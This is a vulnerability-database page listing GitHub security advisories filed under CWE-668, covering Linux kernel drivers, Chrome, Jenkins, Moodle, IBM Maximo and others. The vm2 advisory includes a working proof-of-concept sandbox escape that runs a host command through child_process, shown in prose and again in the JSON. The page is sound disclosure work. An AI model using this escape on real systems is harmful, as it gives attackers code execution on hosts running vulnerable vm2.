CWE-668
DiscouragedExposure of Resource to Wrong Sphere
Abstraction: Class · Status: Draft
The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource.
1251 vulnerabilities reference this CWE, most recent first.
GHSA-9RXX-PQ63-85W7
Vulnerability from github – Published: 2025-08-16 12:30 – Updated: 2026-01-22 18:50In the Linux kernel, the following vulnerability has been resolved:
drm/imagination: Fix kernel crash when hard resetting the GPU
The GPU hard reset sequence calls pm_runtime_force_suspend() and pm_runtime_force_resume(), which according to their documentation should only be used during system-wide PM transitions to sleep states.
The main issue though is that depending on some internal runtime PM state as seen by pm_runtime_force_suspend() (whether the usage count is <= 1), pm_runtime_force_resume() might not resume the device unless needed. If that happens, the runtime PM resume callback pvr_power_device_resume() is not called, the GPU clocks are not re-enabled, and the kernel crashes on the next attempt to access GPU registers as part of the power-on sequence.
Replace calls to pm_runtime_force_suspend() and pm_runtime_force_resume() with direct calls to the driver's runtime PM callbacks, pvr_power_device_suspend() and pvr_power_device_resume(), to ensure clocks are re-enabled and avoid the kernel crash.
{
"affected": [],
"aliases": [
"CVE-2025-38521"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-16T11:15:45Z",
"severity": "HIGH"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/imagination: Fix kernel crash when hard resetting the GPU\n\nThe GPU hard reset sequence calls pm_runtime_force_suspend() and\npm_runtime_force_resume(), which according to their documentation should\nonly be used during system-wide PM transitions to sleep states.\n\nThe main issue though is that depending on some internal runtime PM\nstate as seen by pm_runtime_force_suspend() (whether the usage count is\n\u003c= 1), pm_runtime_force_resume() might not resume the device unless\nneeded. If that happens, the runtime PM resume callback\npvr_power_device_resume() is not called, the GPU clocks are not\nre-enabled, and the kernel crashes on the next attempt to access GPU\nregisters as part of the power-on sequence.\n\nReplace calls to pm_runtime_force_suspend() and\npm_runtime_force_resume() with direct calls to the driver\u0027s runtime PM\ncallbacks, pvr_power_device_suspend() and pvr_power_device_resume(),\nto ensure clocks are re-enabled and avoid the kernel crash.",
"id": "GHSA-9rxx-pq63-85w7",
"modified": "2026-01-22T18:50:53Z",
"published": "2025-08-16T12:30:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38521"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/9f852d301f642223c4798f3c13ba15e91165d078"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/d38376b3ee48d073c64e75e150510d7e6b4b04f7"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/e066cc6e0f094ca2120f1928d126d56f686cd73e"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-9V7R-QG2V-5VFC
Vulnerability from github – Published: 2024-06-13 15:30 – Updated: 2024-06-13 15:30IBM Maximo Asset Management 7.6.1.3 and IBM Maximo Application Suite 8.10 and 8.11 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 279973.
{
"affected": [],
"aliases": [
"CVE-2024-22333"
],
"database_specific": {
"cwe_ids": [
"CWE-525",
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-06-13T14:15:11Z",
"severity": "MODERATE"
},
"details": "IBM Maximo Asset Management 7.6.1.3 and IBM Maximo Application Suite 8.10 and 8.11 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 279973.",
"id": "GHSA-9v7r-qg2v-5vfc",
"modified": "2024-06-13T15:30:36Z",
"published": "2024-06-13T15:30:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22333"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/279973"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7157256"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7157257"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-9VG3-4RFJ-WGCM
Vulnerability from github – Published: 2026-05-08 16:20 – Updated: 2026-05-14 20:37Summary
VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.
Details
In handleException due to // SECURITY (post-GHSA-mpf8 hardening): use `from` (not `ensureThis`) exceptions with a null proto will be assumed to come from the other side and being proxied. Therefore, it is possible to get the proxied and unproxied object of a sandbox object with a null proto when thrown and then catched which allows to get the host Function object.
PoC
const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
const o = {__proto__: null};
try {
throw o;
} catch (e) {
e.f = Buffer.prototype.inspect
o.f.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
}
`));
Impact
Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "vm2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.11.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44009"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-08T16:20:58Z",
"nvd_published_at": "2026-05-13T18:16:17Z",
"severity": "CRITICAL"
},
"details": "### Summary\n\nVM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.\n\n### Details\n\nIn `handleException` due to ``// SECURITY (post-GHSA-mpf8 hardening): use `from` (not `ensureThis`)`` exceptions with a null proto will be assumed to come from the other side and being proxied. Therefore, it is possible to get the proxied and unproxied object of a sandbox object with a null proto when thrown and then catched which allows to get the host `Function` object.\n\n### PoC\n\n```js\nconst {VM} = require(\"vm2\");\nconst vm = new VM();\nconsole.log(vm.run(`\nconst o = {__proto__: null};\ntry {\n\tthrow o;\n} catch (e) {\n\te.f = Buffer.prototype.inspect\n\to.f.constructor(\"return process\")().mainModule.require(\u0027child_process\u0027).execSync(\u0027touch pwned\u0027);\n}\n`));\n```\n\n### Impact\n\nAttackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.",
"id": "GHSA-9vg3-4rfj-wgcm",
"modified": "2026-05-14T20:37:12Z",
"published": "2026-05-08T16:20:58Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-9vg3-4rfj-wgcm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44009"
},
{
"type": "PACKAGE",
"url": "https://github.com/patriksimek/vm2"
},
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "vm2 has Sandbox Breakout Through Null Proto Exception"
}
GHSA-9VMX-V4H8-HFV8
Vulnerability from github – Published: 2022-07-27 00:00 – Updated: 2022-07-29 00:00Inappropriate implementation in iframe in Google Chrome prior to 101.0.4951.41 allowed a remote attacker to leak cross-origin data via a crafted HTML page.
{
"affected": [],
"aliases": [
"CVE-2022-1501"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-07-26T22:15:00Z",
"severity": "MODERATE"
},
"details": "Inappropriate implementation in iframe in Google Chrome prior to 101.0.4951.41 allowed a remote attacker to leak cross-origin data via a crafted HTML page.",
"id": "GHSA-9vmx-v4h8-hfv8",
"modified": "2022-07-29T00:00:19Z",
"published": "2022-07-27T00:00:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1501"
},
{
"type": "WEB",
"url": "https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_26.html"
},
{
"type": "WEB",
"url": "https://crbug.com/1293191"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/202208-25"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-9W5W-XQMF-4QCW
Vulnerability from github – Published: 2024-08-21 03:31 – Updated: 2025-09-26 21:30In the Linux kernel, the following vulnerability has been resolved:
wifi: ath12k: change DMA direction while mapping reinjected packets
For fragmented packets, ath12k reassembles each fragment as a normal packet and then reinjects it into HW ring. In this case, the DMA direction should be DMA_TO_DEVICE, not DMA_FROM_DEVICE. Otherwise, an invalid payload may be reinjected into the HW and subsequently delivered to the host.
Given that arbitrary memory can be allocated to the skb buffer, knowledge about the data contained in the reinjected buffer is lacking. Consequently, there’s a risk of private information being leaked.
Tested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.1.1-00209-QCAHKSWPL_SILICONZ-1
{
"affected": [],
"aliases": [
"CVE-2024-43881"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-08-21T01:15:12Z",
"severity": "HIGH"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath12k: change DMA direction while mapping reinjected packets\n\nFor fragmented packets, ath12k reassembles each fragment as a normal\npacket and then reinjects it into HW ring. In this case, the DMA\ndirection should be DMA_TO_DEVICE, not DMA_FROM_DEVICE. Otherwise,\nan invalid payload may be reinjected into the HW and\nsubsequently delivered to the host.\n\nGiven that arbitrary memory can be allocated to the skb buffer,\nknowledge about the data contained in the reinjected buffer is lacking.\nConsequently, there\u2019s a risk of private information being leaked.\n\nTested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.1.1-00209-QCAHKSWPL_SILICONZ-1",
"id": "GHSA-9w5w-xqmf-4qcw",
"modified": "2025-09-26T21:30:26Z",
"published": "2024-08-21T03:31:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43881"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/33322e3ef07409278a18c6919c448e369d66a18e"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/6925320fcd40d8042d32bf4ede8248e7a5315c3b"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/e99d9b16ff153de9540073239d24adc3b0a3a997"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-9WVM-C92G-HVQG
Vulnerability from github – Published: 2022-02-09 00:00 – Updated: 2026-07-05 03:30PrinterLogic Web Stack versions 19.1.1.13 SP9 and below are vulnerable to an Insecure Direct Object Reference (IDOR) vulnerability that allows an unauthenticated attacker to reassign drivers for any printer.
{
"affected": [],
"aliases": [
"CVE-2021-42640"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-02-02T18:15:00Z",
"severity": "CRITICAL"
},
"details": "PrinterLogic Web Stack versions 19.1.1.13 SP9 and below are vulnerable to an Insecure Direct Object Reference (IDOR) vulnerability that allows an unauthenticated attacker to reassign drivers for any printer.",
"id": "GHSA-9wvm-c92g-hvqg",
"modified": "2026-07-05T03:30:44Z",
"published": "2022-02-09T00:00:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-42640"
},
{
"type": "WEB",
"url": "https://portswigger.net/daily-swig/printerlogic-vendor-addresses-triple-rce-threat-against-all-connected-endpoints"
},
{
"type": "WEB",
"url": "https://securityaffairs.co/wordpress/127194/security/printerlogic-printer-management-suite-flaws.html"
},
{
"type": "WEB",
"url": "https://thecyberthrone.in/2022/01/26/printerlogic-%F0%9F%96%A8-fixes-critical-vulnerabilities-in-its-suite/?utm_source=rss\u0026utm_medium=rss\u0026utm_campaign=printerlogic-%25f0%259f%2596%25a8-fixes-critical-vulnerabilities-in-its-suite"
},
{
"type": "WEB",
"url": "https://www.printerlogic.com/security-bulletin"
},
{
"type": "WEB",
"url": "https://www.securityweek.com/printerlogic-patches-code-execution-flaws-printer-management-suite"
},
{
"type": "WEB",
"url": "https://www.yahooinc.com/paranoids/paranoids-vulnerability-research-printerlogic-issues-security-alert"
},
{
"type": "WEB",
"url": "http://printerlogic.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-9WXH-JJJ5-67CV
Vulnerability from github – Published: 2022-01-13 00:00 – Updated: 2023-05-24 17:47Jenkins SSH Agent Plugin prior to 1.23.2 and 1.22.1 does not perform permission checks in several HTTP endpoints.
This allows attackers with Overall/Read access to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.
An enumeration of credentials IDs in SSH Agent Plugin 1.23.2 and 1.22.1 requires the appropriate permissions.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.jenkins-ci.plugins:ssh-agent"
},
"ranges": [
{
"events": [
{
"introduced": "1.23"
},
{
"fixed": "1.23.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.jenkins-ci.plugins:ssh-agent"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.22.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-20620"
],
"database_specific": {
"cwe_ids": [
"CWE-668",
"CWE-862"
],
"github_reviewed": true,
"github_reviewed_at": "2022-07-27T21:24:04Z",
"nvd_published_at": "2022-01-12T20:15:00Z",
"severity": "MODERATE"
},
"details": "Jenkins SSH Agent Plugin prior to 1.23.2 and 1.22.1 does not perform permission checks in several HTTP endpoints.\n\nThis allows attackers with Overall/Read access to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.\n\nAn enumeration of credentials IDs in SSH Agent Plugin 1.23.2 and 1.22.1 requires the appropriate permissions.",
"id": "GHSA-9wxh-jjj5-67cv",
"modified": "2023-05-24T17:47:11Z",
"published": "2022-01-13T00:00:58Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-20620"
},
{
"type": "WEB",
"url": "https://github.com/jenkinsci/ssh-agent-plugin/commit/04f526d2f73a6fc24b59df20ba03d95265114835"
},
{
"type": "WEB",
"url": "https://github.com/jenkinsci/ssh-agent-plugin/commit/9c08b9f93cfb3ada0f0124f5bd7f0d027728a750"
},
{
"type": "WEB",
"url": "https://github.com/CVEProject/cvelist/blob/2d78eb36f4d084db7fb35f1535d8d84fdcb7d859/2022/20xxx/CVE-2022-20620.jsonhttps://github.com/CVEProject/cvelist/blob/2d78eb36f4d084db7fb35f1535d8d84fdcb7d859/2022/20xxx/CVE-2022-20620.json"
},
{
"type": "PACKAGE",
"url": "https://github.com/jenkinsci/ssh-agent-plugin"
},
{
"type": "WEB",
"url": "https://www.jenkins.io/security/advisory/2022-01-12/#SECURITY-2189"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2022/01/12/6"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Missing permission checks in SSH Agent Plugin allow enumerating credentials IDs"
}
GHSA-9X63-M3CC-QF3G
Vulnerability from github – Published: 2022-05-13 01:47 – Updated: 2024-04-23 22:51In Moodle 2.x and 3.x, searching of arbitrary blogs is possible because a capability check is missing.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "moodle/moodle"
},
"ranges": [
{
"events": [
{
"introduced": "3.2"
},
{
"fixed": "3.2.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "moodle/moodle"
},
"ranges": [
{
"events": [
{
"introduced": "3.1"
},
{
"fixed": "3.1.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "moodle/moodle"
},
"ranges": [
{
"events": [
{
"introduced": "3.0"
},
{
"fixed": "3.0.10"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "moodle/moodle"
},
"ranges": [
{
"events": [
{
"introduced": "2.7"
},
{
"fixed": "2.7.20"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2017-7490"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": true,
"github_reviewed_at": "2024-04-23T22:51:17Z",
"nvd_published_at": "2017-05-15T14:29:00Z",
"severity": "MODERATE"
},
"details": "In Moodle 2.x and 3.x, searching of arbitrary blogs is possible because a capability check is missing.",
"id": "GHSA-9x63-m3cc-qf3g",
"modified": "2024-04-23T22:51:17Z",
"published": "2022-05-13T01:47:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7490"
},
{
"type": "PACKAGE",
"url": "https://github.com/moodle/moodle"
},
{
"type": "WEB",
"url": "https://moodle.org/mod/forum/discuss.php?d=352354"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Moodle Unauthorized searching of arbitrary blogs by typing full url"
}
GHSA-9XF3-QH47-FRWV
Vulnerability from github – Published: 2022-05-24 19:19 – Updated: 2022-07-13 00:01There is an Unauthorized file access vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability by modifying soft links may tamper with the files restored from backups.
{
"affected": [],
"aliases": [
"CVE-2021-22488"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-10-28T13:15:00Z",
"severity": "HIGH"
},
"details": "There is an Unauthorized file access vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability by modifying soft links may tamper with the files restored from backups.",
"id": "GHSA-9xf3-qh47-frwv",
"modified": "2022-07-13T00:01:09Z",
"published": "2022-05-24T19:19:06Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22488"
},
{
"type": "WEB",
"url": "https://consumer.huawei.com/en/support/bulletin/2021/7"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-C227-Q7J7-XF88
Vulnerability from github – Published: 2024-05-21 15:31 – Updated: 2025-09-19 15:31In the Linux kernel, the following vulnerability has been resolved:
ipack: ipoctal: fix stack information leak
The tty driver name is used also after registering the driver and must specifically not be allocated on the stack to avoid leaking information to user space (or triggering an oops).
Drivers should not try to encode topology information in the tty device name but this one snuck in through staging without anyone noticing and another driver has since copied this malpractice.
Fixing the ABI is a separate issue, but this at least plugs the security hole.
{
"affected": [],
"aliases": [
"CVE-2021-47401"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-05-21T15:15:25Z",
"severity": "HIGH"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nipack: ipoctal: fix stack information leak\n\nThe tty driver name is used also after registering the driver and must\nspecifically not be allocated on the stack to avoid leaking information\nto user space (or triggering an oops).\n\nDrivers should not try to encode topology information in the tty device\nname but this one snuck in through staging without anyone noticing and\nanother driver has since copied this malpractice.\n\nFixing the ABI is a separate issue, but this at least plugs the security\nhole.",
"id": "GHSA-c227-q7j7-xf88",
"modified": "2025-09-19T15:31:07Z",
"published": "2024-05-21T15:31:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-47401"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/0a9c36a2e06a249acbed64e8e0b84637c2ad7575"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/2725925982dc96a78069cd118ea3d66759bfdad7"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/5f6a309a699675680df15d9b6d389114515b4426"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/741ea2670e021350e54f491106bdaa22dc50e6a0"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/829f13d6079cf7a2465522f39acb43033e9b320d"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/8657158a3b68c85234e6da3d8eae33d6183588b7"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/a89936cce87d60766a75732a9e7e25c51164f47c"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/acb96e782bad427ca4bb1bd94af660acd1462380"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"type": "CVSS_V3"
}
]
}
No mitigation information available for this CWE.
No CAPEC attack patterns related to this CWE.